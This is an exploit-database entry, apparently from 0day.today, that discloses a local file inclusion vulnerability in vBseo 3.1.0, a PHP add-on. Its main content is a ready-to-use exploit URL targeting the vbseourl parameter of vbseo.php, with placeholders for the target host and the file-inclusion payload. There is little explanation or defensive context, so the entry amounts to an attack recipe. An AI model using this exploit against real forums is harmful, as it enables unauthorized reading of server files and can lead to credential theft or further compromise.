id: 11003
date: 02/20/2010
title: vBseo v3.1.0 Local File Include Vulnerability
author: ViRuSMaN
cves: 

=============================================
vBseo v3.1.0 Local File Include Vulnerability
=============================================

    [»] Script:             [ vBseo ]
    [»] Language:           [ PHP ]

###########################################################################

===[ Exploit ]===

    [»] http://[target].com/[path]/vbseo.php?vbseoembedd=1&vbseourl=[LFI]



Author: ViRuSMaN <-

###########################################################################



#  0day.today [2023-03-26]  #